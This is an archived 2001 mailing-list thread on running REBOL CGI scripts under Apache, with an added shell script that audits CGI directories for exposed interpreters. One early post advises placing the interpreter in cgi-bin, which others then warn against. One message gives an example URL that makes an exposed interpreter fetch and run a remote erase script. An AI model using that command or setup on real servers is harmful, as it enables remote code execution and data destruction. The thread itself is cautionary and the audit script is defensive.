APACHE + REBOL as CGI?
[1/27] from: carlos:lorenz at: 30-Jul-2001 12:17
Hi friends,
I'm trying to run some CGI in REBOL on the server but have no success.
According to the support team (that loves PERL) their machines (running
APACHE) are not configured to support REBOL as CGI.
My question is: is it really necessary to configure APACHE to recognize REBOL
scripts or can I just upload REBOL.EXE to a subdirectory under my space and
from there use it to run my scripts?
Carlos
[2/27] from: matt:blis at: 14-Sep-2001 16:31
Carlos Lorenz
<[carlos--lorenz--net]> wrote on 30/07/01 16:17:20:
>Hi friends,
>I'm trying to run some CGI in REBOL on the server but have no success.
<<quoted lines omitted: 3>>
>REBOL scripts or can I just upload REBOL.EXE to a subdirectory under
>my space and from there use it to run my scripts?
Hi Carlos.
I did this:
1. Put rebol executable in location like /usr/bin/rebol/
2. Initialise rebol network via telnet or editing the user.r file
3. create scripts with .cgi ending
4. Set shebang to #!/usr/bin/rebol/rebol --cgi
Worked like a charm, without needing to update any apache conf files.
I think apache has built in support for .cgi files.
Hope this is of some use.
Matt.
[3/27] from: ryan:christiansen:intellisol at: 14-Sep-2001 10:29
I run REBOL on Apache all of the time without configuring Apache.
Put rebol executable in the /bin or /cgi-bin and chmod 755
all scripts should shebang to the rebol executable (e.g. #!rebol -cs)
make sure your scripts are set executable (e.g. chmod 755)
Also, use .cgi extensions on your scripts. This is key, since Apache is
probably set up to execute .cgi files, but NOT .r files.
-Ryan
[4/27] from: tim:johnsons-web at: 14-Sep-2001 9:00
On Fri, Sep 14, 2001 at 10:29:32AM -0500, [ryan--christiansen--intellisol--com] wrote:
> I run REBOL on Apache all of the time without configuring Apache.
>
> Put rebol executable in the /bin or /cgi-bin and chmod 755
>
> all scripts should shebang to the rebol executable (e.g. #!rebol -cs)
>
> make sure your scripts are set executable (e.g. chmod 755)
>
> Also, use .cgi extensions on your scripts. This is key, since Apache is
> probably set up to execute .cgi files, but NOT .r files.
I run rebol apps as .r extensions on both my home linux machine and
my domain (linux also). Not a problem that I've seen, but if anyone
has any comments on that process, I'd welcome an alternative opinion.
I strongly recommend against using the default cgi-bin directory.
I use "ScriptAlias".
Tim
> -Ryan
> "Carlos
<<quoted lines omitted: 28>>
> [rebol-request--rebol--com] with "unsubscribe" in the
> subject, without the quotes.
--
Tim Johnson <[tim--johnsons-web--com]>
http://www.johnsons-web.com
[5/27] from: ryanc:iesco-dms at: 14-Sep-2001 9:09
Ryan,
You should never ever put any type of interpreter in a directory accessible from the
internet with executable permissions. Security holes don't get any bigger than this.
--Ryan Cole
[ryan--christiansen--intellisol--com] wrote:
> I run REBOL on Apache all of the time without configuring Apache.
> Put rebol executable in the /bin or /cgi-bin and chmod 755
<<quoted lines omitted: 34>>
--
Ryan Cole
Programmer Analyst
www.iesco-dms.com
707-468-5400
[6/27] from: matt:blis at: 14-Sep-2001 17:11
[ryan--christiansen--intellisol--com] wrote on 14/09/01 16:29:32:
>I run REBOL on Apache all of the time without configuring Apache.
>
>Put rebol executable in the /bin or /cgi-bin and chmod 755
I wouldn't advise this, as it's gonna open up massive holes in your
server, unless you're running on your local machine and firewalled up
to the teeth...
Matt
[7/27] from: ryan:christiansen:intellisol at: 14-Sep-2001 11:21
It never occurred to me before that this would be a problem. Now that I
think about it though.... whoah!
Good thoughts.
-Ryan
[8/27] from: tim:johnsons-web at: 14-Sep-2001 9:21
On Fri, Sep 14, 2001 at 05:11:50PM +0100, Matt Burns wrote:
> [ryan--christiansen--intellisol--com] wrote on 14/09/01 16:29:32:
> >
<<quoted lines omitted: 4>>
> server, unless you're running on your local machine and firewalled up
> to the teeth...
I agree. I use symlink (ln) and ScriptAlias and I AM firewalled up
to the teeth....
> Matt
--
Tim Johnson <[tim--johnsons-web--com]>
http://www.johnsons-web.com
[9/27] from: matt:blis at: 14-Sep-2001 17:32
Tim Johnson <[tim--johnsons-web--com]> wrote on 14/09/01 18:21:46:
>On Fri, Sep 14, 2001 at 05:11:50PM +0100, Matt Burns wrote:
>> [ryan--christiansen--intellisol--com] wrote on 14/09/01 16:29:32:
<<quoted lines omitted: 8>>
>I agree. I use symlink (ln) and ScriptAlias and I AM firewalled up
>to the teeth....
:-)
Matt.
[10/27] from: john:thousand-hills at: 14-Sep-2001 17:44
Give it a shot. I run Rebol that way on NT with Sambar.
With NT/IIS, I have to install the rebol.
I will be attempting to run scripts on Redhat 7.1 next week.
//john
At 12:17 PM 7/30/2001 -0300, you wrote:
[11/27] from: ryanc:iesco-dms at: 14-Sep-2001 17:16
I don't mean to preach, but just make very sure that it is not visible from the
web. Something like this with the proper url encoding could be deadly:
http://www.nosecurity.com/cgi-bin/rebol/rebol -cs --do "do
http://hacksters.com/eraseall.r"
--Ryan
john wrote:
> Give it a shot. I run Rebol that way on NT with Sambar.
> With NT/IIS, I have to install the rebol.
<<quoted lines omitted: 11>>
--
Ryan Cole
Programmer Analyst
www.iesco-dms.com
707-468-5400
[12/27] from: john:thousand-hills at: 14-Sep-2001 19:40
I don't get it Ryan? Why would not having to "install" Rebol make a
security hole?
//john
At 05:16 PM 9/14/2001 -0700, you wrote:
[13/27] from: matt:blis at: 15-Sep-2001 11:14
> From: [rebol-bounce--rebol--com] [mailto:[rebol-bounce--rebol--com]]
> On Behalf Of john
>
> I don't get it Ryan? Why would not having to "install" Rebol make a
> security hole?
As Ryan pointed out with his very astute example, placing the Rebol
binary in the cgi-bin does two things:
1) it allows your Rebol executable to be used in any url on your server
2) it allows *anyone* to do 1)
Due to the nature of Rebol being able to 'do remote scripts, someone
could quite easily write a script to send files/passwords/do system
commands on YOUR server.
This is Not A Good Thing(tm)
Matt.
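
An added example, not part of the original thread: a shell audit for the condition discussed in the messages above, an interpreter sitting executable inside a web-mapped CGI directory. The interpreter name list and the sample directory are constructed for illustration; the shebang in the sample script is the one quoted earlier in the thread.

```shell
#!/bin/sh
# Added example: list files in a CGI directory that would let a URL reach
# an interpreter directly. The name list is illustrative, not exhaustive.
INTERPRETERS='rebol rebol.exe perl perl.exe python python3 php php-cgi ruby tclsh sh bash ksh csh'

# Hex of the first four bytes of a file (7f454c46 is the ELF magic).
magic_of() {
    head -c 4 "$1" 2>/dev/null | od -An -tx1 | tr -d ' \n'
}

# Print one "REASON<TAB>PATH" line per risky executable directly inside $1.
# Symlinks are followed, so a linked interpreter is reported as well.
audit_cgi_dir() {
    dir=$1
    for f in "$dir"/*; do
        [ -f "$f" ] && [ -x "$f" ] || continue
        base=$(basename "$f")
        for name in $INTERPRETERS; do
            if [ "$base" = "$name" ]; then
                printf 'interpreter-name\t%s\n' "$f"
                continue 2
            fi
        done
        case $(magic_of "$f") in
            7f454c46|4d5a*)   # ELF, or DOS/PE "MZ": compiled program
                printf 'native-binary\t%s\n' "$f" ;;
            2321*)            # "#!" script: flag a shebang pointing into $dir
                interp=$(head -n 1 "$f" | sed 's/^#![[:space:]]*//; s/[[:space:]].*//')
                case $interp in
                    "$dir"/*) printf 'shebang-in-cgi-dir\t%s\n' "$f" ;;
                esac ;;
        esac
    done
}

# Constructed sample cgi-bin: the two "binaries" hold only the ELF magic.
make_sample_dir() {
    d=$(mktemp -d) || return 1
    printf '#!/usr/bin/rebol/rebol --cgi\nREBOL []\nprint "ok"\n' > "$d/hello.cgi"
    printf '#!%s/rebol -cs\nREBOL []\n' "$d" > "$d/local.cgi"
    printf '\177ELF' > "$d/rebol"
    printf '\177ELF' > "$d/tool.cgi"
    chmod 755 "$d"/*
    printf '%s\n' "$d"
}

sample=$(make_sample_dir)
audit_cgi_dir "$sample"
rm -rf "$sample"
```

A `native-binary` hit needs a manual look, since a compiled CGI program is legitimate while a renamed interpreter is not. Run the function against every directory that the server maps for script execution.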
[14/27] from: gchiu:compkarori at: 15-Sep-2001 23:51
> As Ryan pointed out with his very astute example, placing
> the Rebol
> binary in the cgi-bin does two things:
>
> 1) it allows your Rebol executable to be used in any url
> on your server
> 2) it allows *anyone* to do 1)
I would like to see a working example of this exploit. It
has been mentioned before, but has *anyone* actually got it
to do this??
--
Graham Chiu
[15/27] from: matt:blis at: 15-Sep-2001 12:38
> -----Original Message-----
> From: [rebol-bounce--rebol--com] [mailto:[rebol-bounce--rebol--com]]
<<quoted lines omitted: 13>>
> has been mentioned before, but has *anyone* actually got it
> to do this??
I doubt you will ever see this on any live server[1]! This is a very,
very well known security hazard, and is explained in more detail here
http://www.cert.org/advisories/CA-1996-11.html
HTH
Matt.
[1] that's been set up by someone that knows what they're doing.
[16/27] from: john:thousand-hills at: 15-Sep-2001 9:50
Let me ask again, what does this have to do with NOT INSTALLING Rebol?
I merely copied the files into a directory REBOL similar to the way I have
done PERL for years.
The only operating system that has demands for the setup of REBOL, or PERL
for that matter is NT4/IIS4 and 2000-Server/IIS5.. And I use all these OS
combination professionally and use PERL/REBOL now on all of them. I just
started using Rebol on Redhat 7.1 this week.
Otherwise NT/2000 with Sambar and Redhat is simply copy the files and use
them. The common thread, as I see it -is that IIS requires the setup to
work with PERL and REBOL..
Now if that makes me stupid or insecure -so be it, maybe you are just
brighter than the rest of us.
/john
At 12:38 PM 9/15/2001 +0100, you wrote:
[17/27] from: john:thousand-hills at: 15-Sep-2001 9:53
Matt:
First -you are assuming that not installing Rebol equates to placing it in
the CGI-BIN.
You made that assumption, I did not. I copied PERL into its own directory
for years, why would I place REBOL in the bin?
//john
At 11:14 AM 9/15/2001 +0100, you wrote:
[18/27] from: tim:johnsons-web at: 15-Sep-2001 17:58
Hi John:
I've noticed your questions and have time to just touch
briefly on it with what I know.
I personally don't know why one would have to be concerned about
the location of the binary. Doesn't sound to me like you're doing
anything incorrect as far as Linux goes.....
I do not think it's a good idea to have the rebol binary in cgi-bin,
and it's really a good idea to have your own internal mapping so that
you're not really using the standard cgi-bin. I'm referring to using
the ScriptAlias, which is in either access.conf or httpd.conf on
RH 7.0 (I think - just use RH 6.0 myself).
I'm sorry that I can't offer more than that, perhaps there will
be more on this after the weekend. HINT: Sometimes it helps
to repost under a different subject if you don't get the full
edification that you are looking for.
TIA
Tim
On Sat, Sep 15, 2001 at 09:50:17AM -0500, john wrote:
> Let me ask again, what does this have to do with NOT INSTALLING Rebol?
> I merely copied the files into a directory REBOL similar to the way I have
<<quoted lines omitted: 16>>
--
Tim Johnson <[tim--johnsons-web--com]>
http://www.johnsons-web.com
[19/27] from: john:thousand-hills at: 15-Sep-2001 21:25
Thanks Tim.
I have Rebol running. In Linux each domain has its own CGI-BIN for the
scripts but the binaries and libraries reside in a directory accessed via
an alias. As with NT/SAMBAR I simply created the REBOL directories and
copied files, added " .r " to the cgi-bin as an accepted suffix attempting
to keep the directories identical to my other servers for platform
script/compatibility sake.
I say again -the only combination that I have experienced any trouble
running Rebol is NT/IIS combinations. The book covers little of what is
necessary to run rebol there and we fell upon it kind of by accident, but
have just recently set up 3 very active servers to run REBOL on top of
IIS-4 (one gets a Million hits a month).
Any way, NT/IIS is the only combination I see requiring formal
installation. And the setup required is identical to that of PERL. That
should help.
We will document the steps necessary and pass them on the REBOL and Book
authors.
John
At 05:58 PM 9/15/2001 -0800, you wrote:
[20/27] from: john:thousand-hills at: 15-Sep-2001 21:47
Tim:
I wholeheartedly suggest that you go to 7.1 Redhat. The difference is
overwhelming.
My installation takes up about 40Meg and the setup runs a real nice
selection of server components. Be liberal because in about 10 days (you
can change that) the system will set any unused services to a hot-standby
status freeing up the assets until they are needed.
It runs Rock Solid, now I am talking 7.1 not 7.0
John
At 05:58 PM 9/15/2001 -0800, you wrote:
[21/27] from: tim:johnsons-web at: 15-Sep-2001 20:10
On Sat, Sep 15, 2001 at 09:47:13PM -0500, john wrote:
> Tim:
I will be building a new machine in a month or so. I do expect to go
to something with the new Kernel..... I imagine I will choose either
RH 7.1 or SUSE...
> I whole hearted suggest that you go to 7.1 Redhat. The difference is
> overwhelming.
<<quoted lines omitted: 14>>
--
Tim Johnson <[tim--johnsons-web--com]>
http://www.johnsons-web.com
[22/27] from: tim:johnsons-web at: 15-Sep-2001 20:13
On Sat, Sep 15, 2001 at 09:25:24PM -0500, john wrote:
> Thanks Tim.
> I have Rebol running. In Linux each domain has its own CGI-BIN for the
<<quoted lines omitted: 13>>
> We will document the steps necessary and pass them on the REBOL and Book
> authors.
Great! Pass them on to me too. I've got nothing on the internet with
that combination, but would like to be informed in case I have any
requests to go on an NT server...
> John
> At 05:58 PM 9/15/2001 -0800, you wrote:
<<quoted lines omitted: 20>>
--
Tim Johnson <[tim--johnsons-web--com]>
http://www.johnsons-web.com
[23/27] from: john:thousand-hills at: 15-Sep-2001 22:31
Ok, I will document it all Monday and pass it by the LAN Administrator to
make sure I miss nothing.
He and I did all three (NT-4/IIS-4) servers together because the book was a
little weak. All three were equally difficult and identical in the resolution.
I was surprised because my Linux and Sambar servers were so auto-loaded by
copy/paste from the CD -I was not expecting a formal install
procedure. Thank God the CD had the files in a directory called "
/rebol/ "...
/john
At 08:13 PM 9/15/2001 -0800, you wrote:
[24/27] from: john:thousand-hills at: 15-Sep-2001 23:39
Tim:
You never know when you will need NT. The client sometimes demands the
standard because they are afraid to be dependent on finding another
contractor with SAMBAR or LINUX knowledge.
This is the same problem I have with Rebol. Until I showed them things they
were unable to accomplish before. When they realized that Rebol would free
them from the need for NT to run ASP, they jumped aboard.
The project that convinced them was the bus routes for the blind, not only
will it talk to them, it is dynamic, once any change hits the data base
-the next request displays it. It has saved me a well documented 8 man
weeks per year, and I draw a very high salary. They were impressed.
Even more than all that, the blind can SEE (or hear) the schedules -that
was a very high goal for me. And some of you guys helped me out.
John
At 08:13 PM 9/15/2001 -0800, you wrote:
[25/27] from: matt:blis at: 16-Sep-2001 14:28
John wrote:
> Let me ask again, what does this have to do with NOT INSTALLING Rebol?
Sorry, I quoted you as you were the last to reply, not in direct
response.
AFAIK this has nothing to do with whether you've installed Rebol or not.
As long as the executable is not directly available, you shouldn't have
too many problems in that area.
Sorry for the confusion! I'll mind the quotes next time!
Matt.
[26/27] from: john:thousand-hills at: 16-Sep-2001 23:28
Actually Matt, we go to great lengths to alias our access to the binaries.
I am a retired US Naval Officer -communications and Intelligence. My oldest
son is in Air Force Intel. Computer Forensics and a Redhat Certified Linux
Engineer.
I have him run my systems for access holes, then patch it up according to
his recommendations.
Having done that, I don't worry because I can't stop anybody smarter than
all that.
//john
At 02:28 PM 9/16/2001 +0100, you wrote:
[27/27] from: tim:johnsons-web at: 17-Sep-2001 8:40
On Sun, Sep 16, 2001 at 11:28:02PM -0500, john wrote:
> Actually Matt, we go to great lengths to alias our access to the binaries.
>
> I am a retired US Naval Officer -communications and Intelligence. My oldest
> son is in Air Force Intel. Computer Forensics and a Redhat Certified Linux
> Engineer.
This is sort of off-topic here, but I want to pose this question
(which IS apropos to these times) IMHO:
If so much interest is shown in hacking microsoft, sending viruses
in email, and general mischief (and some of it seems so well done),
why not "enlist" these hackers in disrupting, intercepting,
communications and money flow between terrorists?
On a slightly related note, I have an article written 1-Sep-2001
that might be of slight interest.
Disclaimer: My persona in this "webzine" is to be somewhat provocative,
somewhat tongue-in-cheek and rambling is permissible
BUT, having said that - I both plug rebol and talk about some
serious stuff that most of us haven't shown a lot of interest in,
but perhaps that has changed now.
http://www.frozen-north-linuxonline.com/
see "Tim's Bytes"
tj
> I have him run my systems for access holes, then patch it up according to
> his recommendations.
<<quoted lines omitted: 25>>
--
Tim Johnson <[tim--johnsons-web--com]>
http://www.johnsons-web.com
Notes
- Quoted lines have been omitted from some messages.